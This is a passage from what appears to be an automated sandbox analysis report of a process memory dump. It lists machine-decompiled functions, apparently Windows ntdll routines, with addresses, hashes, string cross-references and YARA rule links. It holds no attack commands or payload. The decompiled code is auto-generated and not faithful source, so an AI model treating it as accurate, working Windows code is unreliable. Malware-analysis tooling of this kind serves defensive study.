				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01020BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01063706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0102FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01063540;
						E0102FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0103DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01070C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E010297C0();
					}
					return E0102B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01063971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01063884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0102FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01029650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01063787(_a4,  &_v352, _t80);
						}
					}
					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E010295D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01063552
0x0106355a
0x0106355d
0x01063566
0x01063567
0x0106357e
0x0106358f
0x010635a1
0x010635a5
0x0106366b
0x0106366b
0x0106366d
0x01063672
0x01063679
0x01063685
0x0106368d
0x0106369d
0x010636a7
0x010636b8
0x010636c6
0x010636c7
0x010636dc
0x010636e1
0x010636e7
0x010636e9
0x010636e9
0x01063703
0x01063703
0x010635b5
0x010635c0
0x010635c4
0x00000000
0x00000000
0x010635ca
0x010635d7
0x010635e2
0x010635e6
0x010635e8
0x010635f5
0x010635fa
0x01063603
0x01063604
0x01063609
0x0106360a
0x01063612
0x01063613
0x0106361e
0x01063622
0x01063628
0x0106362f
0x0106362f
0x01063636
0x01063638
0x0106363b
0x01063642
0x01063642
0x01063636
0x01063657
0x01063657
0x0106365c
0x01063662
0x01063669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0106358F

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 12ec3afecfbfb0e8b67c330d468658ba1f57af7b7d3379fced94bc1009d9e544
Instruction ID: 89d7be19221ae4357cf1ace0147799c841b77539bd02bb48f30a7a9ee2c44224
Opcode Fuzzy Hash: 12ec3afecfbfb0e8b67c330d468658ba1f57af7b7d3379fced94bc1009d9e544
Instruction Fuzzy Hash: CD4142F1D0052DABDB21DA50CC85FEEB77CAB54714F0085A5EA49AB241DB319E888FE4

Uniqueness

Uniqueness Score: -1.00%

Function 010B05AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E010B05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E010B07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01029730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E010AA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E010AA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E010B1293(_t79, _v40, E010B07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01007D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E010A138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x010b05c5
0x010b05ca
0x010b05d3
0x010b06db
0x010b06db
0x010b06dd
0x010b06e3
0x010b06e3
0x010b05dd
0x010b05e7
0x010b05f6
0x010b0600
0x010b0607
0x010b0610
0x010b0615
0x010b061a
0x010b061c
0x010b061e
0x010b0624
0x010b0625
0x010b0627
0x010b0628
0x010b0631
0x010b0640
0x010b064d
0x010b0654
0x010b0654
0x010b0631
0x010b066d
0x010b0674
0x00000000
0x00000000
0x010b0692
0x010b069e
0x010b06b0
0x010b06a0
0x010b06a9
0x010b06a9
0x010b06b8
0x010b06d6
0x010b06d6
0x00000000

Strings

`, xrefs: 010B0633

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 8f8828e649ad0adde63528c3903b2256daef612217638f83c7c50d1dcaf3490c
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: C431E232700306ABE710DE28CC85FDB7BE9AB88754F144229FA949B284D770E904C791

Uniqueness

Uniqueness Score: -1.00%

Function 01063884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01063884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01029650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L01004620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01029650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01063893
0x01063896
0x01063899
0x0106389f
0x010638a0
0x010638a4
0x010638a9
0x010638ac
0x010638ad
0x010638ae
0x010638af
0x010638b1
0x010638b4
0x010638bb
0x010638bc
0x010638bd
0x010638c4
0x010638c8
0x010638ca
0x010638ca
0x010638d5
0x0106393e
0x01063940
0x01063942
0x01063952
0x01063954
0x01063961
0x01063961
0x01063967
0x0106396e
0x0106396e
0x01063947
0x0106394c
0x00000000
0x0106394c
0x010638ea
0x010638ee
0x010638f8
0x010638f9
0x010638ff
0x01063900
0x01063902
0x01063903
0x0106390b
0x0106390f
0x01063950
0x00000000
0x01063950
0x01063915
0x0106391d
0x0106391d
0x01063922
0x01063926
0x00000000
0x01063928
0x0106392b
0x0106392b
0x01063935
0x01063937
0x01063937
0x00000000
0x01063935
0x01063926
0x010638f0
0x00000000

Strings

BinaryName, xrefs: 010638B4

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: cf87457310b0904703b30d1b866f1fc71ca53360bcc31f63beee45934be82da0
Instruction ID: abc62330088f1cb655fa51e9ca1aee9a0d5264c94ab0b686c16cdd741b950524
Opcode Fuzzy Hash: cf87457310b0904703b30d1b866f1fc71ca53360bcc31f63beee45934be82da0
Instruction Fuzzy Hash: BF31E832D0051AAFEB16DA58C945EAFB7B8FB44720F014169E998AB251D7319E00CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0101D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0101D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x10dd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E01004120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0102B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E010298D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E010295D0();
					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0101d29c
0x0101d2a6
0x0101d2b1
0x0101d2b5
0x0101d2b6
0x0101d2bc
0x0101d2bd
0x0101d2be
0x0101d2bf
0x0101d2c2
0x0101d2c4
0x0101d2cc
0x0101d384
0x0101d34b
0x0101d34f
0x0101d350
0x0101d351
0x0101d35c
0x0101d35c
0x0101d2d6
0x0101d2da
0x0101d2e1
0x0101d361
0x0101d369
0x0101d36d
0x0101d2e3
0x0101d2e3
0x0101d2e3
0x0101d2e5
0x0101d2ed
0x0101d2f5
0x0101d2fa
0x0101d302
0x0101d303
0x0101d30b
0x0101d30f
0x0101d313
0x0101d318
0x0101d31c
0x0101d320
0x0101d379
0x0101d37d
0x00000000
0x00000000
0x0105affe
0x0105b001
0x0105b011
0x00000000
0x0101d322
0x0101d322
0x0101d330
0x0101d337
0x0101d35d
0x0101d339
0x0101d33f
0x0101d38c
0x0101d38c
0x0101d33f
0x0101d349
0x00000000
0x0101d349

Strings

@, xrefs: 0101D303

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 8a5fb735a3d31f9132942b77f55b3b9c576675a930d6aedba31ab77a4428fd9b
Instruction ID: ca14e4fdd16c7439f7763d37c1c05a328750590d319476f86225a275e18cb6be
Opcode Fuzzy Hash: 8a5fb735a3d31f9132942b77f55b3b9c576675a930d6aedba31ab77a4428fd9b
Instruction Fuzzy Hash: 15318DB1508305AFD361DF68C9849AFBBE8EB99654F004A2EF9D483250D739DD04CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00FF1B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00FF1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0102BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0102A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0102A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01004620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x00ff1b8f
0x00ff1b9a
0x00ff1b9c
0x00ff1b9e
0x00ff1ba3
0x01047010
0x01047010
0x00000000
0x00ff1ba9
0x00ff1ba9
0x00ff1bae
0x00000000
0x00ff1bc5
0x00ff1bca
0x00ff1bcf
0x00ff1bd0
0x00ff1bd1
0x00ff1bd2
0x00ff1bd6
0x00ff1bdc
0x00ff1be0
0x01046ffc
0x01047000
0x00000000
0x01047006
0x01047009
0x01047009
0x00ff1be6
0x00ff1bec
0x00ff1c0b
0x00ff1c0b
0x00ff1c0c
0x00ff1c11
0x00ff1c12
0x00ff1c15
0x00ff1c1b
0x00ff1c1f
0x00ff1c31
0x00ff1c33
0x01047026
0x01047026
0x00ff1c21
0x00ff1c24
0x00ff1c24
0x00ff1bee
0x00ff1bee
0x00ff1bf2
0x00ff1c3a
0x00ff1bf4
0x00ff1bf4
0x00ff1c05
0x00ff1c05
0x00ff1c09
0x00ff1c3e
0x00000000
0x00000000
0x00000000
0x00ff1c09
0x00ff1bec
0x00ff1be0
0x00ff1bae
0x00ff1c2e

Strings

WindowsExcludedProcs, xrefs: 00FF1BC5

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: c783135cc6a4f70489bb8d137e949dc63ce2adf953483c82da9aca5cb66aaaaf
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 7F21F877A4112DEBDB229A598880FEB77ADFF51B60F154465FA84DB210D731DC00E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0100F716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0100F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x0100f71d
0x0100f722
0x0100f726
0x01054770
0x0100f765
0x0100f769
0x0100f769
0x0100f732
0x0105477a
0x00000000
0x0105477a
0x0100f738
0x0100f73a
0x0100f73c
0x0100f73f
0x0100f746
0x0100f778
0x0100f7a9
0x0100f7a9
0x0100f754
0x0100f75a
0x0100f75d
0x0100f75f
0x0100f761
0x0100f76f
0x0100f771
0x0100f771
0x0100f76f
0x0100f763
0x00000000
0x0100f763
0x0100f77d
0x0100f7a3
0x0100f7a5
0x00000000
0x0100f7a5
0x0100f77f
0x0100f782
0x0100f784
0x0100f786
0x00000000
0x00000000
0x00000000
0x0100f788
0x0100f748
0x0100f74d
0x0100f78d
0x0100f793
0x0100f7b7
0x0100f7bc
0x00000000
0x0100f7bc
0x0100f798
0x00000000
0x00000000
0x0100f79d
0x0100f7b0
0x00000000
0x0100f7b0
0x0100f79f
0x00000000
0x0100f74f
0x0100f74f
0x00000000
0x0100f74f

Strings

Actx , xrefs: 0100F73F

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 6f800aa920470f409672c4787bca0eebf62b78b6d28a4c9d6dee61360d902688
Instruction ID: 3c3391eab8ead43a6fa658cd2b53713e99f00440e09b966be73b18e317ebbfd1
Opcode Fuzzy Hash: 6f800aa920470f409672c4787bca0eebf62b78b6d28a4c9d6dee61360d902688
Instruction Fuzzy Hash: 0811BE35304A038BFBB78E1C849073A76D5BB85664F24456AE9E9CB3D1EBB0C841A343

Uniqueness

Uniqueness Score: -1.00%

Function 01098DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E01098DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x10c0d50);
				E0103D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01075720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0103DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0103DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0103D130(_t34, _t39, _t40);
			}

0x01098df1
0x01098df1
0x01098df1
0x01098df1
0x01098df1
0x01098df1
0x01098df3
0x01098df8
0x01098dfd
0x01098e00
0x01098e0e
0x01098e2a
0x01098e36
0x01098e38
0x01098e3c
0x01098e46
0x01098e46
0x01098e36
0x01098e50
0x01098e56
0x01098e59
0x01098e5c
0x01098e60
0x01098e67
0x01098e6d
0x01098e73
0x01098e74
0x01098eb1
0x01098ebd

Strings

Critical error detected %lx, xrefs: 01098E21

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 5ab0c902ab245237089116c36910934d714bf62af4af8a6a366dae40a0dc16cb
Instruction ID: 64696c56d821fdeb713962ba62a81f2dca78ba59eaf1ba9eb00c9498db4c34ac
Opcode Fuzzy Hash: 5ab0c902ab245237089116c36910934d714bf62af4af8a6a366dae40a0dc16cb
Instruction Fuzzy Hash: 8F1175B5D00348EADF24DFA889157DCBBB4BB05311F20825EE1A9AB392C3340602DF14

Uniqueness

Uniqueness Score: -1.00%

Function 0107FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0107FF60

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 19b5ba5023f264acee345f1e57d1259effdb8842f890f26b7368e843a687d5b7
Instruction ID: 22e82df3c7b1381ea6e4eb39bbf7a8bc22f609627ef3b63b6ed7ea72e4f0cb2c
Opcode Fuzzy Hash: 19b5ba5023f264acee345f1e57d1259effdb8842f890f26b7368e843a687d5b7
Instruction Fuzzy Hash: C4110475910545EFDB22EB54CC48FD8BBF2FF04714F548084F5885B2A1CB399940DB94

Uniqueness

Uniqueness Score: -1.00%

Function 010B5BA5, Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95aa16ea2516f0dfb26490a8b731dafcb3e68955373fb0c10d72aab8068b533b
Instruction ID: bbdfdef7dd33e46af40618fbcafff32cf3e695039f872339ba39271305e0eed4
Opcode Fuzzy Hash: 95aa16ea2516f0dfb26490a8b731dafcb3e68955373fb0c10d72aab8068b533b
Instruction Fuzzy Hash: CF42487590122A8FDB64CF68C880BE9BBF1FF49704F1481EAD98DAB242D7359985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01004120, Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e50e5af74cf17f0db54baa250871adcc7f74f50beb42e1d80b438203cfba688
Instruction ID: 145932e766d84c0b6bf606a46736bbb711e624f2dd80aa0cdc7229e9d1058075
Opcode Fuzzy Hash: 7e50e5af74cf17f0db54baa250871adcc7f74f50beb42e1d80b438203cfba688
Instruction Fuzzy Hash: 8AF18D706082118FE765CF19C480A7AB7E1FF88714F45896EFAC6CB291E738D981CB56

Uniqueness

Uniqueness Score: -1.00%

Function 010120A0, Relevance: .4, Instructions: 420COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8d322600b27b8e734f63d0ad488313bd2759941f1163b11cd98e3d192a5d455
Instruction ID: cc636def472893938a569dd11de42e03a4e54261d53da5ac9eb7cf3793bb1200
Opcode Fuzzy Hash: b8d322600b27b8e734f63d0ad488313bd2759941f1163b11cd98e3d192a5d455
Instruction Fuzzy Hash: 61F102316083419FEBA6CF2CC8407AF7BE1AF95324F24859DE9D59B285D739D841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00FFD5E0, Relevance: .4, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cacdaf3047092d59a97bc7254e42187e52022ef62e0015de226f230f18712ff
Instruction ID: 6fb51acb59f20522c2877c12fc0ce250e60e1bdc0cce265baeafb91d4780d94d
Opcode Fuzzy Hash: 9cacdaf3047092d59a97bc7254e42187e52022ef62e0015de226f230f18712ff
Instruction Fuzzy Hash: C8E1D271A013198FEB34DF29C880BB9B7B2BF85314F1441E9DA899B2A1DB34DD81DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00FF849B, Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1199b2a88efe83d8cc3c4be2698c36ca56869a08c78743d6e3e56e416fcbab4e
Instruction ID: fe1b3f665e4d3a216fc5ee96dbba2d065b2203e1230272d9cfadc7591e037b1a
Opcode Fuzzy Hash: 1199b2a88efe83d8cc3c4be2698c36ca56869a08c78743d6e3e56e416fcbab4e
Instruction Fuzzy Hash: CBB18FB1E00209DFDB15DF98C984BAEBBB5BF48354F204129E645AB355DB74AC42DB80

Uniqueness

Uniqueness Score: -1.00%

Function 0101513A, Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8035dfebaf3b74db4286fcba9aa22d21b6f5120a4e59bc744b3ec9d2d956fe2
Instruction ID: 83049ef9dcb2c374849a235ed24b54e404256e4837f4472eb7aa50790d5caa2f
Opcode Fuzzy Hash: b8035dfebaf3b74db4286fcba9aa22d21b6f5120a4e59bc744b3ec9d2d956fe2
Instruction Fuzzy Hash: E8C130755093818FD394CF28C480A5AFBE1BF89304F544AAEF9D98B392D735E845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 010103E2, Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8839e148b833daef377447e4ad663115ca87575722f5a49366a5942c9282bf4
Instruction ID: c3e968f067e96caa4a9417e80f07f41a99be4a726ee6f86d293658605e134f65
Opcode Fuzzy Hash: d8839e148b833daef377447e4ad663115ca87575722f5a49366a5942c9282bf4
Instruction Fuzzy Hash: 68910971E002159FEB71AA6CC844BEE7BE4AB05714F0502A5FDD1EB2D9EB789C80C791

Uniqueness

Uniqueness Score: -1.00%

